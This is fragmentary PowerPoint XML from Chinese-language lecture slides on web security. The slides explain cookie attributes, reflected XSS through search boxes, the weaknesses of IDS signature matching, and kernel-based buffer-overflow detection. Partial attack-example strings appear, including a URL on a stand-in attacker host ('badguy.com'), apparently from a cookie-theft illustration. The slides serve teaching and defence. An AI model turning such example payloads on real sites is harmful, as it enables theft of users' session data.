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59" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId80"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId81"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="2323" r:id="rId2"/>
    <p:sldId id="2324" r:id="rId3"/>
    <p:sldId id="2325" r:id="rId4"/>
    <p:sldId id="2326" r:id="rId5"/>
    <p:sldId id="2327" r:id="rId6"/>
    <p:sldId id="2328" r:id="rId7"/>
    <p:sldId id="2329" r:id="rId8"/>
    <p:sldId id="2330" r:id="rId9"/>
    <p:sldId id="2331" r:id="rId10"/>
    <p:sldId id="2332" r:id="rId11"/>
    <p:sldId id="2333" r:id="rId12"/>
    <p:sldId id="2334" r:id="rId13"/>
    <p:sldId id="2335" r:id="rId14"/>
    <p:sldId id="2336" r:id="rId15"/>
    <p:sldId id="2078" r:id="rId16"/>
    <p:sldId id="2079" r:id="rId17"/>
    <p:sldId id="2080" r:id="rId18"/>
    <p:sldId id="2295" r:id="rId19"/>
    <p:sldId id="2296" r:id="rId20"/>
    <p:sldId id="2083" r:id="rId21"/>
    <p:sldId id="2084" r:id="rId22"/>
    <p:sldId id="2100" r:id="rId23"/>
    <p:sldId id="2101" r:id="rId24"/>
    <p:sldId id="2297" r:id="rId25"/>
    <p:sldId id="2102" r:id="rId26"/>
    <p:sldId id="2103" r:id="rId27"/>
    <p:sldId id="2104" r:id="rId28"/>
    <p:sldId id="2105" r:id="rId29"/>
    <p:sldId id="2117" r:id="rId30"/>
    <p:sldId id="2298" r:id="rId31"/>
    <p:sldId id="2299" r:id="rId32"/>
    <p:sldId id="2300" r:id="rId33"/>
    <p:sldId id="2301" r:id="rId34"/>
    <p:sldId id="2302" r:id="rId35"/>
    <p:sldId id="2303" r:id="rId36"/>
    <p:sldId id="2304" r:id="rId37"/>
    <p:sldId id="2305" r:id="rId38"/>
    <p:sldId id="2306" r:id="rId39"/>
    <p:sldId id="2307" r:id="rId40"/>
    <p:sldId id="2308" r:id="rId41"/>
    <p:sldId id="2309" r:id="rId42"/>
    <p:sldId id="2310" r:id="rId43"/>
    <p:sldId id="2311" r:id="rId44"/>
    <p:sldId id="2312" r:id="rId45"/>
    <p:sldId id="2313" r:id="rId46"/>
    <p:sldId id="2314" r:id="rId47"/>
    <p:sldId id="2315" r:id="rId48"/>
    <p:sldId id="2137" r:id="rId49"/>
    <p:sldId id="2316" r:id="rId50"/>
    <p:sldId id="2317" r:id="rId51"/>
    <p:sldId id="2318" r:id="rId52"/>
    <p:sldId id="2139" r:id="rId53"/>
    <p:sldId id="2140" r:id="rId54"/>
    <p:sldId id="2141" r:id="rId55"/>
    <p:sldId id="2146" r:id="rId56"/>
    <p:sldId id="2147" r:id="rId57"/>
    <p:sldId id="2148" r:id="rId58"/>
    <p:sldId id="2142" r:id="rId59"/>
    <p:sldId id="2319" r:id="rId60"/>
    <p:sldId id="2143" r:id="rId61"/>
    <p:sldId id="2144" r:id="rId62"/>
    <p:sldId id="2145" r:id="rId63"/>
    <p:sldId id="2320" r:id="rId64"/>
    <p:sldId id="2150" r:id="rId65"/>
    <p:sldId id="2151" r:id="rId66"/>
    <p:sldId id="2152" r:id="rId67"/>
    <p:sldId id="2153" r:id="rId68"/>
    <p:sldId id="2154" r:id="rId69"/>
    <p:sldId id="2155" r:id="rId70"/>
    <p:sldId id="2156" r:id="rId71"/>
    <p:sldId id="2157" r:id="rId72"/>
    <p:sldId id="2158" r:id="rId73"/>
    <p:sldId id="2159" r:id="rId74"/>
    <p:sldId id="2321" r:id="rId75"/>
    <p:sldId id="2161" r:id="rId76"/>
    <p:sldId id="2163" r:id="rId77"/>
    <p:sldId id="2164" r:id="rId78"/>
    <p:sldId id="2165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f" initials="w" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="wl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D1ACA"/>
    <a:srgbClr val="FACA00"/>
    <a:srgbClr val="3366FF"/>
    <a:srgbClr val="6699FF"/>
    <a:srgbClr val="000066"/>
    <a:srgbClr val="66FFCC"/>
    <a:srgbClr val="66CCFF"/>
    <a:srgbClr val="029A1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68" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="65" d="100"/>
          <a:sy n="65" d="100"/>
        </p:scale>
        <p:origin x="6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292"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-2832" y="2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1T15:36:15.92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3B4577F0-ED67-4FFE-A316-3B3AEC2EA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E46A9642-FD4A-45CC-9F4F-8E10AB9AB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93118-89C1-46D5-A5F9-D5DB293598F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77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4370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不设置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Cookie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安全属性的原因主要有两种：一种是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Web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应用开发者不知道安全属性或不愿意使用安全属性；第二种是设置安全属性后应用无法运行。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A9642-FD4A-45CC-9F4F-8E10AB9AB4AA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00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Cookie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在生成时就会被指定一个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Expire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值，这就是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Cookie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的生存周期，在这个周期内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Cookie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有效，超出周期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Cookie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就会被自动清除。有些页面将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Cookie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的生存周期设置为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0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或负值，这样在关闭页面时，浏览器立即清除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Cookie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，有效保护了用户隐私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A9642-FD4A-45CC-9F4F-8E10AB9AB4A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9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93118-89C1-46D5-A5F9-D5DB293598F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77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8153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A9642-FD4A-45CC-9F4F-8E10AB9AB4A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52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2ED6C-E0DE-4E88-992F-C6FD1BE37116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说明：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、防火墙等安全措施对于此类攻击完全没用。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32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A9642-FD4A-45CC-9F4F-8E10AB9AB4A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00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0ADC0-B318-45CC-9130-F3B790A9505E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，文件对象模型，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Document Object Model.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>是给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xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件使用的一组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，是建立网页与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语言沟通的桥梁，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对象代表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中的表格，可以由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本取用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364143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C413F-FDA4-48FD-8A72-A3A13F3BEBDA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</a:rPr>
              <a:t>Search”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>框内文本信息反馈回用户页面是什么意思呢？比如说用户输入“价格”这个词，点击查询，从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>端反馈回来的刷新页面常常会将“价格”这个词显示在页面上，比如：您查找的“价格”不存在；您查找的“价格”有如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>条记录信息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  <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>而如果输入的不是正常的文本，而是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>脚本，页面也会尝试将这个脚本当成文本显示出来，这样就会引发客户端浏览器去执行这段脚本，不是简单的显示。这样就能知道该站点对输入的文本没有进行严格的检查过滤，是存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击漏洞的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422759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A9642-FD4A-45CC-9F4F-8E10AB9AB4AA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37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61395C-8CDD-4FA2-ADB5-FD6889F54024}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1C1C1C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9E74429-26DC-471E-9251-C4807B21DCEF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5F7E-5148-4CB2-963A-95C37528F550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8ED92-367B-4CD8-A26C-4E6248EAD4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3875" y="142875"/>
            <a:ext cx="2070100" cy="5526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8813" y="142875"/>
            <a:ext cx="6062662" cy="5526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DC17-A35B-464B-A9AB-82DCA891CFF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975A5-F217-4B48-B315-600F055D97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4500"/>
              </a:lnSpc>
              <a:defRPr b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ts val="4500"/>
              </a:lnSpc>
              <a:defRPr b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lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:defRPr b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lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:defRPr b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lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:defRPr b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AD5F1-67B5-4A0D-ABC1-AB8E7ABAD35E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B7420-10C5-4439-A879-6C64816B7E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8813" y="155416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1213" y="155416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7064C-0A55-4E07-B965-6C3D3728ABB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8E056-97FC-4A70-8131-E02F6583BF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ED8A2-82FC-4DC1-9863-2A50613A6AE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273C-C71A-40AC-9777-8B20B0D93B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295FB-9049-4B10-8132-A2704FC040E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2B63A-4FE1-4D96-8285-FCAE99EA789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94A6A-DBE8-4CE6-9619-41C62789DE7E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3275C-2774-4B25-97E7-7065F970E9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51A7E-C721-4544-8D2F-3546C0565F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1E245-20D5-4D11-AD9A-5B593160C0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4397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4397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8620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8620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7889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3317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1223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2875"/>
            <a:ext cx="7793037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55416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48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ea typeface="宋体" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2812D72D-DA04-4C9C-9A6E-C01386CD88CE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2023/4/12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484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48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charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{38C58080-A4A9-4607-B318-5D24794E2C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539750" y="6332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827088" y="6189663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0" r:id="rId1"/>
    <p:sldLayoutId id="2147484661" r:id="rId2"/>
    <p:sldLayoutId id="2147484662" r:id="rId3"/>
    <p:sldLayoutId id="2147484663" r:id="rId4"/>
    <p:sldLayoutId id="2147484664" r:id="rId5"/>
    <p:sldLayoutId id="2147484665" r:id="rId6"/>
    <p:sldLayoutId id="2147484666" r:id="rId7"/>
    <p:sldLayoutId id="2147484667" r:id="rId8"/>
    <p:sldLayoutId id="2147484668" r:id="rId9"/>
    <p:sldLayoutId id="2147484669" r:id="rId10"/>
    <p:sldLayoutId id="2147484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/abc.asp?id=Y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/abc.asp?id=Y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badguy.com/info.p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99701A8-46FB-40B4-B313-DB0401CDB00B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20515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12355" name="WordArt 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1979613" y="2349500"/>
            <a:ext cx="5905500" cy="1871663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宋体"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1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宋体"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>应用中的问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32873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807C36A-E4E3-4EC3-89B8-63023ACE7E7E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329731" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="152400"/>
            <a:ext cx="6870700" cy="828675"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的根本问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1196975"/>
            <a:ext cx="7772400" cy="47466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为什么通过一些简单的变换，攻击者就可以逃避检测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>根本的原因是传统的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>只能根据固定的规则和规定的匹配模式进行检测，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>并不理解这些操作对于操作系统和应用程序意味着什么，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>很难理解通过环境变量的组合构造的操作命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>通过更新规则的办法来反击隐秘攻击，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>要付出多大的努力</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>如果我们希望</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>能够理解各式各样的组合和变换，实际上我们就相当于要求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" smtClean="0"/>
              <a:t>完成大部分本由操作系统完成的任务，这实际是不可能的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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7185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2B8B313-5CAD-440B-B356-1B49F93D1914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330755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IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在安全体系结构中层次的两种观点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628739" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900113" y="1736725"/>
            <a:ext cx="7772400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检测应该处在与保护基本不交叉的一个独立的层次上，这种类型的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>易实现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由于与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>无关所以可靠性较好，现在大多数基于网络的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>基本上体现了这一观点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由于两个层次没有交叉，因此不能信息共享，应该有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>和应用程序完成的工作已必须由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>完成，比如协议还原，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>Unicode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>解码工作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加重了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>的负担，同时由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>对协议的理解与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>和应用程序可能并不完全一致，也就隐含了误报和漏报的可能性</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1878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8C8A932-BDC7-4FD1-8677-3820F1D9EB1B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331779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IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在安全体系结构中层次的两种观点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62976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检测应当与保护紧密结合，不是覆盖在系统之上的独立层次，而应该与系统的其他部分有机的结合在一起</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在实际中通常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>以内核补丁或驱动程序的形式出现。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>这种方法往往能够以非常简洁的方法达到准确监测的目的。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849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18448D0-C025-420B-AE1A-AEB7F5BA6866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332803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一个例子</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630787" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="14843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缓冲区溢出攻击是远程攻击的主流方法，但如何监测一直没有好办法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因为缓冲区溢出攻击最本质的特征是在堆栈中执行代码，但如果脱离</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>内核，就很难准确监测出这种特征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在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下，通过截获某些重要的系统调用，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>exec,read,setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>等，如果发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>所指向的范围不再代码段内，一般可判定为缓冲区溢出。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这种方法可通过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下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>LKM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>方法非常简洁的实现，并且误报率和漏报率都很低</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16342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6AFAFAE-64D3-44D6-B187-85CF81C594E0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333827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缺点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333828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难以实现</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>由于运行在内核中，影响系统的效率</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>难以证明数据的可靠性和完整性</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208326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7254" y="1295400"/>
            <a:ext cx="7987666" cy="97393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网站攻击技术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 descr="27182921_08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3395663"/>
            <a:ext cx="4829175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Line 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipV="1">
            <a:off x="1553830" y="4011796"/>
            <a:ext cx="6253738" cy="31621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7671" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm rot="3419336">
            <a:off x="1261728" y="1900301"/>
            <a:ext cx="479425" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699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7672" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1338692" y="1939988"/>
            <a:ext cx="30168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777673" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm flipV="1">
            <a:off x="1536366" y="2482360"/>
            <a:ext cx="6253738" cy="2436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7674" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2104691" y="1851715"/>
            <a:ext cx="5685413" cy="5847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sz="3200" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>应用体系结构脆弱性分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1777675" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2122155" y="3421583"/>
            <a:ext cx="570287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sz="3200" dirty="0">
